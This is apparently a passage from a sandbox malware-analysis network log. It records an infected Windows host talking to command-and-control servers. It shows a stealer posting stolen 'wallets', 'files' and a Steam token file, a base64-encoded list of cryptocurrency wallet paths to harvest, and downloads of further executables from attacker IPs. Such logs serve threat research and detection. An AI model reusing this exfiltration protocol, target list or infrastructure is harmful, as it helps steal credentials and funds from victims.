Dec 19, 2024 10:11:20.582202911 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="message"wallets------ECGIIIDAKJDHJKFHIEBF--
Dec 19, 2024 10:11:21.021271944 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 19, 2024 10:11:21.033885002 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d 0a Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="message"files------CBFCBKKFBAEHJKEBKFCB--
Dec 19, 2024 10:11:21.471940994 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:11:21.489728928 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="file"------JJKEBGHJKFIDGCAAFCAF--
Dec 19, 2024 10:11:22.429322004 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:11:22.447022915 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"ybncbhylepme------JDGIECGIEBKJJJJKEGHJ--
Dec 19, 2024 10:11:22.895590067 CET	271	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50048	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:05.631752014 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017482001&unit=246122658369
Dec 19, 2024 10:11:07.253664970 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50049	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:07.392738104 CET	63	OUT	GET /files/geopoxid/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:11:08.716248035 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:08 GMT Content-Type: application/octet-stream Content-Length: 1880576 Last-Modified: Wed, 18 Dec 2024 18:02:50 GMT Connection: keep-alive ETag: "67630e4a-1cb200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 69 eb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_g0J@`Ji@T0h 1 H@.rsrc X@.idata 0Z@ *@\@xnuzvlhe0/.^@tzuttanx J@.taggant00J"@
Dec 19, 2024 10:11:08.716265917 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:08.716283083 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:08.716375113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:08.716391087 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:11:08.716407061 CET	1236	IN	Data Raw: bb b0 e8 25 48 d8 e8 54 62 24 db 18 18 8f 0a ea 11 a8 c4 3a a5 18 d2 54 13 51 6f f9 c6 0e 61 47 fe c3 52 f2 60 cb 07 c0 dd cf 89 a0 a5 34 fc f6 a5 6a 7e 10 f9 e6 c2 d0 25 5e 06 0d 64 47 a1 1c 82 52 9c 42 fd 96 87 7d 7d 1d f0 dc bb 90 07 ec 9c be Data Ascii: %HTb$:TQoaGR`4j~%^dGRB}}<J'4^RBLVI.@wxcO?@vFW]8m\;\|$6=SIQGp<#4aOp?Gz6&]+-On'fU
Dec 19, 2024 10:11:08.716640949 CET	1236	IN	Data Raw: f0 7d bc 6b 66 0c a3 ba ea d7 76 f0 8d 42 74 c0 e7 c9 51 1b d9 5c a9 e1 37 50 ee c5 3e 71 9a a5 e5 d7 25 d0 57 ef 04 c0 e9 9b 38 06 0b 21 03 8f 37 9a 03 d7 ec c6 5e a7 07 ab 2d fd 11 64 2a e4 e5 db d6 df 8b 54 5c b2 77 68 68 0d e5 7e 2d f4 c4 54 Data Ascii: }kfvBtQ\7P>q%W8!7^-d*T\whh~-T^quXvXhT.:'7!uI#M8tPpPe%GWsop'9>tMLj?Z:QSUsU>oLy.Lz2X[,p=>EQv
Dec 19, 2024 10:11:08.716665983 CET	1236	IN	Data Raw: 66 e4 f5 e9 26 02 90 18 c5 1b 0a d0 c4 a4 da dd 55 28 6d 71 c4 af df 62 8c c4 02 d3 fe a3 82 ac 45 f1 5c a3 72 bc 02 c8 b5 68 35 66 fe 92 84 fc e6 54 c5 c2 4a 7c 9c 7f b6 2e 5e a5 f9 9a 75 ca 71 d6 21 f4 68 4a d4 99 31 cb 92 71 fe dc e1 9b 15 c7 Data Ascii: f&U(mqbE\rh5fTJ\|.^uq!hJ1q/?~74\RN,:[Ux^$Zt)sL8TxbV)h(^PfU\|9"cqqc5qw.HjT-P>(n<Ur5X3Ai
Dec 19, 2024 10:11:08.716681004 CET	1236	IN	Data Raw: 2a 0c d2 fc e1 02 61 da 28 7c 5f 46 e6 0f 2f cb c4 65 45 07 c1 da 29 05 95 2f 5e fd 4d 5e 51 4c 6e 35 49 27 eb 13 3f 89 22 7b ed 72 6b 7a 5a cb 2b 92 3b b0 af 32 5f 73 1b 60 5e 13 05 b2 c7 a1 b4 57 a7 a8 8e 43 4e 0b 79 52 82 80 fb d1 52 13 23 dd Data Ascii: *a(\|_F/eE)/^M^QLn5I'?"{rkzZ+;2_s`^WCNyRR#[\L u-#zpaqT'#16zp.B<41eftELaB6&`!Y8vHt9\|/}p`/?XSfH,l`5EY9.bc88# XP;$suF
Dec 19, 2024 10:11:08.716696978 CET	1236	IN	Data Raw: 80 98 bb f1 69 35 18 ec 6f ae 98 e8 10 d8 92 11 56 cb 9e 07 54 ce 60 60 f7 a2 4a 2d f1 5b 1f c4 dc 0f 06 cb 46 f8 3b 6c 73 4e 0e cd 4d 5b 48 71 ee 6f 5c 10 55 f7 3a db fe db 55 69 c3 80 a2 b3 7c 6c 27 24 79 db 25 13 b5 0e 32 53 b5 4f e7 f0 9d 5b Data Ascii: i5oVT``J-[F;lsNM[Hqo\U:Ui\|l'$y%2SO[?wcI59:QlJO9%5q;^\yo{#{1JOd-p4at0$"pPL[*6}7#]$HyI/O(X7Ws`A4
Dec 19, 2024 10:11:08.836492062 CET	1236	IN	Data Raw: dc c1 27 31 b0 c4 9e 2a d1 31 0c 0d 9c 7c 1e 3a 18 79 41 88 cc 55 ce a0 85 63 72 8f ad da 63 f0 dc f6 3f d3 a2 e2 36 34 45 f0 91 45 9a 37 f4 df 36 3f e2 9a 65 d7 d6 03 35 8e d1 e1 3b 63 00 06 68 6a 36 33 09 d5 ab 51 2b 34 cb 00 f9 6c af f1 9b 58 Data Ascii: '11\|:yAUcrc?64EE76?e5;chj63Q+4lX^O'tmz(4S:54Ktnh Q}VV5F)p~DmZ`CPT//Kpaf1n7Btoq>~Ti%l4d'l?D@$\|]qys4]

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.6	50055	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:10.518601894 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:11.602936029 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82537 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	50067	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:11.726452112 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:12.862041950 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76348 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:12.886729002 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:13.201817036 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76349 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:13.217658043 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:13.533231020 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76349 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:13.645715952 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:13.964073896 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76349 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:14.868182898 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:15.182964087 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76351 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:15.750363111 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:16.065836906 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76351 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:19.817822933 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:11:20.132721901 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76355 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 19, 2024 10:11:30.150950909 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.6	50069	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:11.793714046 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
